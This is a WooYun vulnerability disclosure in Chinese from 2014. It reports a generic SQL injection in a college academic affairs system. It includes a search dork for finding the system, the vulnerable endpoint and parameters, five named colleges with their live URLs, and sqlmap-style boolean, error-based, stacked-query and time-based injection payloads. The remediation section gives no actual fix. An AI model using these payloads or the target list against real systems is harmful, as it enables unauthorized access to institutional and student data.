当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077423

漏洞标题:某高校在用教务系统通用SQL注射漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: by:龙少

提交时间:2014-09-26 18:04

修复时间:2014-12-25 18:06

公开时间:2014-12-25 18:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-26: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-02: 细节向第三方安全合作伙伴开放
2014-11-23: 细节向核心白帽子及相关领域专家公开
2014-12-03: 细节向普通白帽子公开
2014-12-13: 细节向实习白帽子公开
2014-12-25: 细节向公众公开

简要描述:

某高校使用的教务系统存在通用SQL注射

详细说明:

intitle:::教务信息网络
发现使用该套系统的都是一些高校,以高职院校为主!
通用的POST注入:/bkcx_reg.asp(补考安排查询系统)
存在注入的参数有两个:
1、bkkc =
2、cxbh=
按照要求枚举五个案例:
案例一:泰州职业技术学院:http://jwxt.tzpc.edu.cn/qmkscx_reg.asp
案例二:江海职业技术学院:http://jwgl.jhu.cn/qmkscx_reg.asp
案例三:苏州信息职业技术学院:http://szitu.cn:86/qmkscx_reg.asp
案例四:宿迁高等师范学校:http://222.187.199.60/qmkscx_reg.asp
案例五:常州工程职业技术学院:http://jwcx.czie.net/qmkscx_reg.asp

漏洞证明:

测试:
POST包:Place: POST
Parameter: xbdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' AND 5187=5187 A
ND 'RhUr'='RhUr
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' AND 1751=CONVER
T(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(103)+CHAR(104)+CHAR(113)+(SELECT (CASE WH
EN (1751=1751) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(106)+CH
AR(100)+CHAR(113))) AND 'rSgJ'='rSgJ
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 '; WAITFOR DELAY
'0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: bksj=88952634&cxbh=88952634&bkkc=88952634&xbdm=01 ' WAITFOR DELAY '
0:0:5'--
常州工程职业技术学院:http://jwcx.czie.net/qmkscx_reg.asp

1.jpg


1.jpg


泰州职业技术学院:http://jwxt.tzpc.edu.cn/qmkscx_reg.asp

1.jpg


江海职业技术学院:http://jwgl.jhu.cn/qmkscx_reg.asp

1.jpg


苏州信息职业技术学院:http://szitu.cn:86/qmkscx_reg.asp

1.jpg


宿迁职业技术学院:http://222.187.199.60/qmkscx_reg.asp

1.jpg

修复方案:

如上所述!

版权声明:转载请注明来源 by:龙少@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-09-29 11:11

厂商回复:

最新状态:

暂无